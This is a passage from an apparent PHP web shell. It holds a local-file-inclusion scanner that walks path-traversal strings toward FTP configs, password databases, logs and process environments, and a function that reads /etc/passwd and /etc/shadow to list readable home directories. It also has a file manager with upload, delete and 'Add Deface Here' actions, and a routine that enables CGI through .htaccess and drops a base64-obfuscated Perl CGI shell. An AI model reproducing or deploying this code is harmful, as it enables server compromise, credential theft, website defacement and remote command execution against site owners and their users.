  1197. 20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",
  1198. 21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",
  1199. 22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",
  1200. 23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",
  1201. 24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",
  1202. 25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",
  1203. 26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",
  1204. 27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",
  1205. 28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",
  1206. 29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",
  1207. 30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",
  1208. 31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",
  1209. 32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",
  1210. 33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",
  1211. 34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",
  1212. 35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",
  1213. 36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",
  1214. 37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",
  1215. 38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",
  1216. 39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",
  1217. 40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",
  1218. 41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",
  1219. 42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",
  1220. 43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",
  1221. 44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");
  1222.  
  1223.  
  1224. $x = 1;
  1225. if ( $type == 1 ) {
  1226. $res1 = FetchURL($target.$lfitest);
  1227. $res2 = FetchURL($target.$lfitest2);
  1228. $rhash1 = md5($res1);
  1229. $rhash2 = md5($res2);
  1230. if ($rhash1 != $rhash2) {
  1231. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  1232. while($lfiaccess[$x]) {
  1233. $res3 = FetchURL($target.$lfiaccess[$x]);
  1234. $rhash3 = md5($res3);
  1235. if ($rhash3 != $rhash2) {
  1236. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiaccess[$x]."\">".$target."".$lfiaccess[$x]."</a><br />";
  1237. }
  1238. else {
  1239. print "<font color='red'>[!] Failed!</font>".$target."".$lfiaccess[$x]."<br />";
  1240. }
  1241. $x++;
  1242. }
  1243. }
  1244. }
  1245. if ( $type == 2 ) {
  1246. $res1 = FetchURL($target.$lfitest);
  1247. $res2 = FetchURL($target.$lfitest2);
  1248. $rhash1 = md5($res1);
  1249. $rhash2 = md5($res2);
  1250. if ($rhash1 != $rhash2) {
  1251. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  1252. while($lficonfig[$x]) {
  1253. $res3 = FetchURL($target.$lficonfig[$x]);
  1254. $rhash3 = md5($res3);
  1255. if ($rhash3 != $rhash2) {
  1256. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lficonfig[$x]."\">".$target."".$lficonfig[$x]."</a><br />";
  1257. }
  1258. else {
  1259. print "<font color='red'>[!] Failed!</font>".$target."".$lficonfig[$x]."<br />";
  1260. }
  1261. $x++;
  1262. }
  1263. }
  1264. }
  1265. if ( $type == 3 ) {
  1266. $res1 = FetchURL($target.$lfitest);
  1267. $res2 = FetchURL($target.$lfitest2);
  1268. $rhash1 = md5($res1);
  1269. $rhash2 = md5($res2);
  1270. if ($rhash1 != $rhash2) {
  1271. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  1272. while($lfierror[$x]) {
  1273. $res3 = FetchURL($target.$lfierror[$x]);
  1274. $rhash3 = md5($res3);
  1275. if ($rhash3 != $rhash2) {
  1276. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfierror[$x]."\">".$target."".$lfierror[$x]."</a><br />";
  1277. }
  1278. else {
  1279. print "<font color='red'>[!] Failed!</font>".$target."".$lfierror[$x]."<br />";
  1280. }
  1281. $x++;
  1282. }
  1283. }
  1284. }
  1285. if ( $type == 4 ) {
  1286. $res1 = FetchURL($target.$lfitest);
  1287. $res2 = FetchURL($target.$lfitest2);
  1288. $rhash1 = md5($res1);
  1289. $rhash2 = md5($res2);
  1290. if ($rhash1 != $rhash2) {
  1291. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  1292. while($lfiphpini[$x]) {
  1293. $res3 = FetchURL($target.$lfiphpini[$x]);
  1294. $rhash3 = md5($res3);
  1295. if ($rhash3 != $rhash2) {
  1296. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiphpini[$x]."\">".$target."".$lfiphpini[$x]."</a><br />";
  1297. }
  1298. else {
  1299. print "<font color='red'>[!] Failed!</font>".$target."".$lfiphpini[$x]."<br />";
  1300. }
  1301. $x++;
  1302. }
  1303. }
  1304. }
  1305. if ( $type == 5 ) {
  1306. $res1 = FetchURL($target.$lfitest);
  1307. $res2 = FetchURL($target.$lfitest2);
  1308. $rhash1 = md5($res1);
  1309. $rhash2 = md5($res2);
  1310. if ($rhash1 != $rhash2) {
  1311. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  1312. while($lfimysql[$x]) {
  1313. $res3 = FetchURL($target.$lfimysql[$x]);
  1314. $rhash3 = md5($res3);
  1315. if ($rhash3 != $rhash2) {
  1316. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfimysql[$x]."\">".$target."".$lfimysql[$x]."</a><br />";
  1317. }
  1318. else {
  1319. print "<font color='red'>[!] Failed!</font>".$target."".$lfimysql[$x]."<br />";
  1320. }
  1321. $x++;
  1322. }
  1323. }
  1324. }
  1325. if ( $type == 6 ) {
  1326. $res1 = FetchURL($target.$lfitest);
  1327. $res2 = FetchURL($target.$lfitest2);
  1328. $rhash1 = md5($res1);
  1329. $rhash2 = md5($res2);
  1330. if ($rhash1 != $rhash2) {
  1331. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";
  1332. while($lfiftp[$x]) {
  1333. $res3 = FetchURL($target.$lfiftp[$x]);
  1334. $rhash3 = md5($res3);
  1335. if ($rhash3 != $rhash2) {
  1336. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiftp[$x]."\">".$target."".$lfiftp[$x]."</a><br />";
  1337. }
  1338. else {
  1339. print "<font color='red'>[!] Failed!</font>".$target."".$lfiftp[$x]."<br />";
  1340. }
  1341. $x++;
  1342. }
  1343. }
  1344. }
  1345. if ( $type == 7 ) {
  1346. $res1 = FetchURL($target.$lfitest);
  1347. $res2 = FetchURL($target.$lfitest2);
  1348. $rhash1 = md5($res1);
  1349. $rhash2 = md5($res2);
  1350. if ($rhash1 != $rhash2) {
  1351. print "<font color='green'>[+] Exploitable!</font> <a href=\"".$target."".$lfitest."\">".$target."".$lfitest."</a><br />";{
  1352. $res3 = FetchURL($target.$lfiprocenv);
  1353. $rhash3 = md5($res3);
  1354. if ($rhash3 != $rhash2) {
  1355. print "<font color='green'>[+] File detected!</font> <a href=\"".$target."".$lfiprocenv."\">".$target."".$lfiprocenv."</a><br />";
  1356. }
  1357. else {
  1358. print "<font color='red'>[!] Failed!</font>".$target."".$lfiprocenv."<br />";
  1359. }
  1360. }
  1361. }
  1362. }
  1363. }
  1364. printFooter();
  1365. }
  1366.  
  1367. function actionReadable() {
  1368. printHeader();
  1369. echo '<h1>Readable Dirs</h1>';
  1370. echo '<div class="content">';
  1371. $sm = ini_get('safe_mode');
  1372. if($sm) {
  1373. echo '<br /><b>Error: safe_mode = on</b><br /><br />';
  1374. } else {
  1375. @$passwd = file('/etc/passwd','r');
  1376. @$passwd = file('/etc/shadow','r');
  1377. if (!$passwd) {
  1378. echo '<br /><b> [-] Error : coudn`t read /etc/passwd or /etc/shadow </b><br /><br />';
  1379. } else {
  1380. $pub = array();
  1381. $users = array();
  1382. $conf = array();
  1383. $i = 0;
  1384. foreach($passwd as $p) {
  1385. $r = explode(':',$p);
  1386. $dirz = $r[5].'/public_html/';
  1387. if(strpos($r[5],'home')) {
  1388. array_push($users,$r[0]);
  1389. if (is_readable($dirz)) {
  1390. array_push($pub,$dirz);
  1391. }
  1392. }
  1393. }
  1394. echo '<br><br>';
  1395. echo "[+] Founded ".sizeof($users)." entrys in /etc/passwd\n"."<br />";
  1396. echo "[+] Founded ".sizeof($pub)." readable public_html directories\n"."<br /><br /><br />";
  1397. foreach ($pub as $user) {
  1398. echo $user."<br>";
  1399. }
  1400. echo "<br /><br /><br />[+] Complete...\n"."<br />";
  1401. }
  1402. }
  1403. echo '</div>';
  1404. printFooter();
  1405. }
  1406.  
  1407. function actionFilesMan() {
  1408. printHeader();
  1409. echo '<h1>File manager</h1><div class=content>';
  1410. if(isset($_POST['p1']) && $_POST['p1']!='deface') {
  1411. switch($_POST['p1']) {
  1412. case 'uploadFile':
  1413. if(!@move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']))
  1414. echo "Can't upload file!";
  1415. break;
  1416. break;
  1417. case 'mkdir':
  1418. if(!@mkdir($_POST['p2']))
  1419. echo "Can't create new dir";
  1420. break;
  1421. case 'delete':
  1422. function deleteDir($path) {
  1423. $path = (substr($path,-1)=='/') ? $path:$path.'/';
  1424. $dh = opendir($path);
  1425. while ( ($item = readdir($dh) ) !== false) {
  1426. $item = $path.$item;
  1427. if ( (basename($item) == "..") || (basename($item) == ".") )
  1428. continue;
  1429. $type = filetype($item);
  1430. if ($type == "dir")
  1431. deleteDir($item);
  1432. else
  1433. @unlink($item);
  1434. }
  1435. closedir($dh);
  1436. rmdir($path);
  1437. }
  1438. if(is_array(@$_POST['f']))
  1439. foreach($_POST['f'] as $f) {
  1440. $f = urldecode($f);
  1441. if(is_dir($f))
  1442. deleteDir($f);
  1443. else
  1444. @unlink($f);
  1445. }
  1446. break;
  1447. case 'paste':
  1448. if($_SESSION['act'] == 'copy') {
  1449. function copy_paste($c,$s,$d){
  1450. if(is_dir($c.$s)){
  1451. mkdir($d.$s);
  1452. $h = opendir($c.$s);
  1453. while (($f = readdir($h)) !== false)
  1454. if (($f != ".") and ($f != "..")) {
  1455. copy_paste($c.$s.'/',$f, $d.$s.'/');
  1456. }
  1457. } elseif(is_file($c.$s)) {
  1458. @copy($c.$s, $d.$s);
  1459. }
  1460. }
  1461. foreach($_SESSION['f'] as $f)
  1462. copy_paste($_SESSION['cwd'],$f, $GLOBALS['cwd']);
  1463. } elseif($_SESSION['act'] == 'move') {
  1464. function move_paste($c,$s,$d){
  1465. if(is_dir($c.$s)){
  1466. mkdir($d.$s);
  1467. $h = opendir($c.$s);
  1468. while (($f = readdir($h)) !== false)
  1469. if (($f != ".") and ($f != "..")) {
  1470. copy_paste($c.$s.'/',$f, $d.$s.'/');
  1471. }
  1472. } elseif(is_file($c.$s)) {
  1473. @copy($c.$s, $d.$s);
  1474. }
  1475. }
  1476. foreach($_SESSION['f'] as $f)
  1477. @rename($_SESSION['cwd'].$f, $GLOBALS['cwd'].$f);
  1478. }
  1479. unset($_SESSION['f']);
  1480. break;
  1481. default:
  1482. if(!empty($_POST['p1']) && (($_POST['p1'] == 'copy')||($_POST['p1'] == 'move')) ) {
  1483. $_SESSION['act'] = @$_POST['p1'];
  1484. $_SESSION['f'] = @$_POST['f'];
  1485. foreach($_SESSION['f'] as $k => $f)
  1486. $_SESSION['f'][$k] = urldecode($f);
  1487. $_SESSION['cwd'] = @$_POST['c'];
  1488. }
  1489. break;
  1490. }
  1491. echo '<script>document.mf.p1.value="";document.mf.p2.value="";</script>';
  1492. }
  1493. if(isset($_POST['p1']) && $_POST['p1']=='deface') {
  1494. $def = file_get_contents(''); //DEFACE LINK HERE
  1495. file_put_contents($_POST['c'].$_POST['p2'],$def);
  1496. }
  1497. $dirContent = @scandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
  1498. if($dirContent === false) { echo 'Can\'t open this folder!'; return; }
  1499. global $sort;
  1500. $sort = array('name', 1);
  1501. if(!empty($_POST['p1'])) {
  1502. if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
  1503. $sort = array($match[1], (int)$match[2]);
  1504. }
  1505. echo '<script>
  1506. function sa() {
  1507. for(i=0;i<document.files.elements.length;i++)
  1508. if(document.files.elements[i].type == \'checkbox\')
  1509. document.files.elements[i].checked = document.files.elements[0].checked;
  1510. }
  1511. </script>
  1512. <table width=\'100%\' class=\'main\' cellspacing=\'0\' cellpadding=\'2\'>
  1513. <form name=files method=post>';
  1514. echo "<tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
  1515. $dirs = $files = $links = array();
  1516. $n = count($dirContent);
  1517. for($i=0;$i<$n;$i++) {
  1518. $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
  1519. $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
  1520. $tmp = array('name' => $dirContent[$i],
  1521. 'path' => $GLOBALS['cwd'].$dirContent[$i],
  1522. 'modify' => @date('Y-m-d H:i:s',@filemtime($GLOBALS['cwd'].$dirContent[$i])),
  1523. 'perms' => viewPermsColor($GLOBALS['cwd'].$dirContent[$i]),
  1524. 'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
  1525. 'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
  1526. 'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
  1527. );
  1528. if(@is_file($GLOBALS['cwd'].$dirContent[$i]))
  1529. $files[] = array_merge($tmp, array('type' => 'file'));
  1530. elseif(@is_link($GLOBALS['cwd'].$dirContent[$i]))
  1531. $links[] = array_merge($tmp, array('type' => 'link'));
  1532. elseif(@is_dir($GLOBALS['cwd'].$dirContent[$i])&& ($dirContent[$i] != "."))
  1533. $dirs[] = array_merge($tmp, array('type' => 'dir'));
  1534. }
  1535. $GLOBALS['sort'] = $sort;
  1536. function cmp($a, $b) {
  1537. if($GLOBALS['sort'][0] != 'size')
  1538. return strcmp($a[$GLOBALS['sort'][0]], $b[$GLOBALS['sort'][0]])*($GLOBALS['sort'][1]?1:-1);
  1539. else
  1540. return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
  1541. }
  1542. usort($files, "cmp");
  1543. usort($dirs, "cmp");
  1544. usort($links, "cmp");
  1545. $files = array_merge($dirs, $links, $files);
  1546. $l = 0;
  1547. foreach($files as $f) {
  1548. echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');"><b>[ '.htmlspecialchars($f['name']).' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
  1549. .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
  1550. $l = $l?0:1;
  1551. }
  1552. echo '<tr><td colspan=5>
  1553. <input type=hidden name=a value=\'FilesMan\'>
  1554. <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
  1555. <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
  1556. <select name=\'p1\'><option value=\'copy\'>Copy</option><option value=\'move\'>Move</option><option value=\'delete\'>Delete</option>';
  1557. if(!empty($_SESSION['act'])&&@count($_SESSION['f'])){echo '<option value=\'paste\'>Paste</option>'; }
  1558. echo '</select>&nbsp;<input type="submit" value="Submit"></td><td colspan="2" align="right" width="1"><input name="def" id="def" value="index.html" size="10"/>&nbsp;<input type="button" onclick="g(\'FilesMan\',\''.htmlspecialchars($GLOBALS['cwd']).'\',\'deface\',document.getElementById(\'def\').value)" value="Add Deface Here"></td></tr>
  1559. </form></table></div>';
  1560. printFooter();
  1561. }
  1562.  
  1563.  
  1564. function actionCgiShell() {
  1565. printHeader();
  1566. echo '<h1>Cgi telnet Evil here </h1><div class=content>';
  1567. mkdir('cgitelnet1', 0755);
  1568. chdir('cgitelnet1');
  1569. $kokdosya = ".htaccess";
  1570. $dosya_adi = "$kokdosya";
  1571. $dosya = fopen($dosya_adi, 'w') or die("Dosya a&#231;&#305;lamad&#305;!");
  1572. $metin = "Options FollowSymLinks MultiViews Indexes ExecCGI
  1573.  
  1574. AddType application/x-httpd-cgi .cin
  1575.  
  1576. AddHandler cgi-script .cin
  1577. AddHandler cgi-script .cin";
  1578. fwrite($dosya, $metin);
  1579. fclose($dosya);
  1580. $cgishellizocin = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWFpbg0KIy0tLS0tLS0tLS0tLS0tLS0t
  1581. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1582. LS0tLQ0KIyA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2Ij5w
  1583. cml2OCBjZ2kgc2hlbGw8L2I+ICMgc2VydmVyDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1584. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQoNCiMt
  1585. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1586. LS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQ29uZmlndXJhdGlvbjogWW91IG5lZWQgdG8gY2hhbmdl
  1587. IG9ubHkgJFBhc3N3b3JkIGFuZCAkV2luTlQuIFRoZSBvdGhlcg0KIyB2YWx1ZXMgc2hvdWxkIHdv
  1588. cmsgZmluZSBmb3IgbW9zdCBzeXN0ZW1zLg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1589. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KJFBhc3N3
  1590. b3JkID0gInByaXY4IjsJCSMgQ2hhbmdlIHRoaXMuIFlvdSB3aWxsIG5lZWQgdG8gZW50ZXIgdGhp
  1591. cw0KCQkJCSMgdG8gbG9naW4uDQoNCiRXaW5OVCA9IDA7CQkJIyBZb3UgbmVlZCB0byBjaGFuZ2Ug
  1592. dGhlIHZhbHVlIG9mIHRoaXMgdG8gMSBpZg0KCQkJCSMgeW91J3JlIHJ1bm5pbmcgdGhpcyBzY3Jp
  1593. cHQgb24gYSBXaW5kb3dzIE5UDQoJCQkJIyBtYWNoaW5lLiBJZiB5b3UncmUgcnVubmluZyBpdCBv
  1594. biBVbml4LCB5b3UNCgkJCQkjIGNhbiBsZWF2ZSB0aGUgdmFsdWUgYXMgaXQgaXMuDQoNCiROVENt
  1595. ZFNlcCA9ICImIjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1h
  1596. bmRzDQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBXaW5kb3dzIE5ULg0KDQokVW5peENtZFNl
  1597. cCA9ICI7IjsJCSMgVGhpcyBjaGFyYWN0ZXIgaXMgdXNlZCB0byBzZXBlcmF0ZSAyIGNvbW1hbmRz
  1598. DQoJCQkJIyBpbiBhIGNvbW1hbmQgbGluZSBvbiBVbml4Lg0KDQokQ29tbWFuZFRpbWVvdXREdXJh
  1599. dGlvbiA9IDEwOwkjIFRpbWUgaW4gc2Vjb25kcyBhZnRlciBjb21tYW5kcyB3aWxsIGJlIGtpbGxl
  1600. ZA0KCQkJCSMgRG9uJ3Qgc2V0IHRoaXMgdG8gYSB2ZXJ5IGxhcmdlIHZhbHVlLiBUaGlzIGlzDQoJ
  1601. CQkJIyB1c2VmdWwgZm9yIGNvbW1hbmRzIHRoYXQgbWF5IGhhbmcgb3IgdGhhdA0KCQkJCSMgdGFr
  1602. ZSB2ZXJ5IGxvbmcgdG8gZXhlY3V0ZSwgbGlrZSAiZmluZCAvIi4NCgkJCQkjIFRoaXMgaXMgdmFs
  1603. aWQgb25seSBvbiBVbml4IHNlcnZlcnMuIEl0IGlzDQoJCQkJIyBpZ25vcmVkIG9uIE5UIFNlcnZl
  1604. cnMuDQoNCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkjIElmIHRoaXMgaXMgMSwgdGhlbiBkYXRh
  1605. IGlzIHNlbnQgdG8gdGhlDQoJCQkJIyBicm93c2VyIGFzIHNvb24gYXMgaXQgaXMgb3V0cHV0LCBv
  1606. dGhlcndpc2UNCgkJCQkjIGl0IGlzIGJ1ZmZlcmVkIGFuZCBzZW5kIHdoZW4gdGhlIGNvbW1hbmQN
  1607. CgkJCQkjIGNvbXBsZXRlcy4gVGhpcyBpcyB1c2VmdWwgZm9yIGNvbW1hbmRzIGxpa2UNCgkJCQkj
  1608. IHBpbmcsIHNvIHRoYXQgeW91IGNhbiBzZWUgdGhlIG91dHB1dCBhcyBpdA0KCQkJCSMgaXMgYmVp
  1609. bmcgZ2VuZXJhdGVkLg0KDQojIERPTidUIENIQU5HRSBBTllUSElORyBCRUxPVyBUSElTIExJTkUg
  1610. VU5MRVNTIFlPVSBLTk9XIFdIQVQgWU9VJ1JFIERPSU5HICEhDQoNCiRDbWRTZXAgPSAoJFdpbk5U
  1611. ID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOw0KJENtZFB3ZCA9ICgkV2luTlQgPyAiY2QiIDog
  1612. InB3ZCIpOw0KJFBhdGhTZXAgPSAoJFdpbk5UID8gIlxcIiA6ICIvIik7DQokUmVkaXJlY3RvciA9
  1613. ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOw0KDQojLS0tLS0tLS0tLS0t
  1614. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1615. LS0tLS0tLS0tDQojIFJlYWRzIHRoZSBpbnB1dCBzZW50IGJ5IHRoZSBicm93c2VyIGFuZCBwYXJz
  1616. ZXMgdGhlIGlucHV0IHZhcmlhYmxlcy4gSXQNCiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlw
  1617. YXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4NCiMgVGhlIGZp
  1618. bGVuYW1lIGlzIHN0b3JlZCBpbiAkaW57J2YnfSBhbmQgdGhlIGRhdGEgaXMgc3RvcmVkIGluICRp
  1619. bnsnZmlsZWRhdGEnfS4NCiMgT3RoZXIgdmFyaWFibGVzIGNhbiBiZSBhY2Nlc3NlZCB1c2luZyAk
  1620. aW57J3Zhcid9LCB3aGVyZSB2YXIgaXMgdGhlIG5hbWUgb2YNCiMgdGhlIHZhcmlhYmxlLiBOb3Rl
  1621. OiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBD
  1622. R0kNCiMgc2NyaXB0cy4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
  1623. LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBSZWFkUGFyc2UgDQp7
  1624. DQoJbG9jYWwgKCppbikgPSBAXyBpZiBAXzsNCglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwp
  1625. Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
  1626. aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
  1627. RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
  1628. CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
  1629. U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
  1630. LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
  1631. YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
  1632. b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
  1633. ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
  1634. YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
  1635. CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
  1636. dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
  1637. ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
  1638. ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
  1639. CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
  1640. CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
  1641. Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
  1642. fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
  1643. KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
  1644. cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
  1645. bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
  1646. ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
  1647. CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
  1648. JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
  1649. ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
